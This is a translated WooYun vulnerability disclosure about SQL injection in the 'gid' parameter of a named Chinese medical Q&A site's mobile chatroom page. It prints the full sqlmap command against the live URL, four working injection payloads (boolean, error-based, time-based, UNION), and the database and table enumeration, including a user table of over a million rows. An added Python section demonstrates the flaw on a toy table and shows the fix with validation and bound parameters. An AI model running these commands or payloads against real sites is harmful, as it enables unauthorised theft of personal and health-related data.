Vulnerability summary

Defect ID: wooyun-2015-0116413

Title: SQL injection on 有问必答网, allows dumping the database

Affected vendor: 有问必答网

Author: 路人甲

Submitted: 2015-05-27 10:17

Fixed: 2015-07-11 10:18

Published: 2015-07-11 10:18

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-05-27: Actively contacting the vendor and awaiting vendor acknowledgement; details not disclosed publicly
2015-07-11: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

Injection point:
sqlmap.py -u "http://m.120ask.com/kuaiwen/tongbingxianglian/chatroom?gid=10055&sex=2" -p "gid" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gid=10055') AND 2323=2323 AND ('ecNe'='ecNe&sex=2

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: gid=10055') AND (SELECT 1523 FROM(SELECT COUNT(*),CONCAT(0x716b626b71,(SELECT (ELT(1523=1523,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('rSTg'='rSTg&sex=2

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: gid=10055') AND (SELECT * FROM (SELECT(SLEEP(5)))vfwl) AND ('zdCv'='zdCv&sex=2

    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: gid=-1844') UNION ALL SELECT NULL,CONCAT(0x716b626b71,0x51796b74476f425a716e,0x7178767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &sex=2
---
[00:42:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[00:42:02] [INFO] fetching database names
[00:42:02] [INFO] the SQL query used returns 3 entries
[00:42:02] [INFO] resumed: information_schema
[00:42:02] [INFO] resumed: bingyou
[00:42:02] [INFO] resumed: test
available databases [3]:
[*] bingyou
[*] information_schema
[*] test
Tables:
Database: bingyou
[71 tables]
+--------------------------+
| __tj_temp |
| apply_hongbao |
| bingyou_chat |
| chat_day_show_tongji |
| chat_day_tongji |
| chat_log |
| check_filter |
| check_relation |
| check_url |
| gift_pay_log |
| gift_product |
| gift_trade |
| group_level |
| invitation |
| jz_patient |
| jz_salary_log |
| jz_salary_operate |
| jz_salary_out |
| klyq_article |
| klyq_todo |
| klyq_tongji |
| klyq_user |
| kw_tbxl_tongji |
| red_group_giving_log |
| red_packet |
| red_packet_sample |
| red_packet_split |
| red_packet_split_log |
| red_packet_trade |
| red_packet_use |
| sta_jz_chat |
| sta_jz_group |
| sta_jz_reply |
| sta_jz_salary |
| sta_jz_topic |
| sta_percent |
| tongji_daily_focus |
| tousu |
| wx_blacklist |
| wx_tbxl_active_log |
| wx_tbxl_apply_join_group |
| wx_tbxl_chat |
| wx_tbxl_chatroom_msg |
| wx_tbxl_chatroom_user |
| wx_tbxl_group_base |
| wx_tbxl_group_news_con |
| wx_tbxl_group_news_con_0 |
| wx_tbxl_group_news_con_1 |
| wx_tbxl_group_news_con_2 |
| wx_tbxl_group_news_con_3 |
| wx_tbxl_group_news_con_4 |
| wx_tbxl_group_news_con_5 |
| wx_tbxl_group_news_con_6 |
| wx_tbxl_group_news_con_7 |
| wx_tbxl_group_news_con_8 |
| wx_tbxl_group_news_con_9 |
| wx_tbxl_group_user |
| wx_tbxl_msg |
| wx_tbxl_msg_user |
| wx_tbxl_msg_user_0 |
| wx_tbxl_msg_user_1 |
| wx_tbxl_msg_user_2 |
| wx_tbxl_msg_user_3 |
| wx_tbxl_msg_user_4 |
| wx_tbxl_msg_user_5 |
| wx_tbxl_msg_user_6 |
| wx_tbxl_msg_user_7 |
| wx_tbxl_msg_user_8 |
| wx_tbxl_msg_user_9 |
| wx_tbxl_patient |
| wx_tbxl_voice |
+--------------------------+
Row count:
select count(1) from wx_tbxl_chatroom_user: '1220314'
[00:54:02] [INFO] fetched data logged to text files
Over a million rows.

Proof of vulnerability: (identical to the sqlmap output given in the detailed description above)


Fix recommendation:

Filter the input parameter.
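The sqlmap payloads above all close a quoted, parenthesised literal with `')`, which is what a concatenated query looks like when the `gid` value is pasted into the SQL text. The following Python is an added example, not code from the report or the vendor: it reproduces that pattern on a constructed sqlite3 table (the real schema is unknown and MySQL is assumed to behave the same for this comparison) and puts the hardened lookup beside it, using the report's own boolean-based probe as the test input.

```python
import re
import sqlite3

# Constructed stand-in for the chatroom table; the site's real schema is not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE chatroom (gid INTEGER, sex INTEGER, name TEXT)")
    conn.executemany("INSERT INTO chatroom VALUES (?, ?, ?)",
                     [(10055, 2, "room-a"), (10056, 1, "room-b"), (10057, 2, "room-c")])
    return conn

def vulnerable_lookup(conn, gid, sex):
    # The pattern the payloads imply: gid is quoted inside parentheses and concatenated
    # into the statement, so a value containing ') leaves the literal and becomes SQL.
    sql = f"SELECT name FROM chatroom WHERE (gid=('{gid}') AND sex={sex})"
    return [row[0] for row in conn.execute(sql)]

GID_RE = re.compile(r"[0-9]{1,10}")

def safe_lookup(conn, gid, sex):
    # Fix 1: allow-list validation. gid is a decimal id and sex is 1 or 2, nothing else.
    if GID_RE.fullmatch(gid) is None or sex not in ("1", "2"):
        raise ValueError("invalid parameter")
    # Fix 2: bound parameters. Values travel separately from the SQL text, so even a
    # value that slipped past validation could not change the query structure.
    rows = conn.execute("SELECT name FROM chatroom WHERE gid=? AND sex=?",
                        (int(gid), int(sex)))
    return [row[0] for row in rows]

def demo():
    conn = make_db()
    # Boolean-based blind probe exactly as it appears in the report's sqlmap output.
    probe = "10055') AND 2323=2323 AND ('ecNe'='ecNe"
    results = {
        "vulnerable_normal": vulnerable_lookup(conn, "10055", "2"),
        # The injected condition is true, so the same row comes back: the probe executed.
        "vulnerable_probe": vulnerable_lookup(conn, probe, "2"),
        "safe_normal": safe_lookup(conn, "10055", "2"),
    }
    try:
        safe_lookup(conn, probe, "2")
        results["safe_probe"] = "accepted"
    except ValueError:
        results["safe_probe"] = "rejected"
    return results

if __name__ == "__main__":
    print(demo())
```

On the vulnerable path the probe returns the same row as the legitimate request, which is exactly the true/false signal sqlmap reads as "boolean-based blind"; on the hardened path it never reaches the database.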

Copyright notice: please credit the source when reposting: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused to respond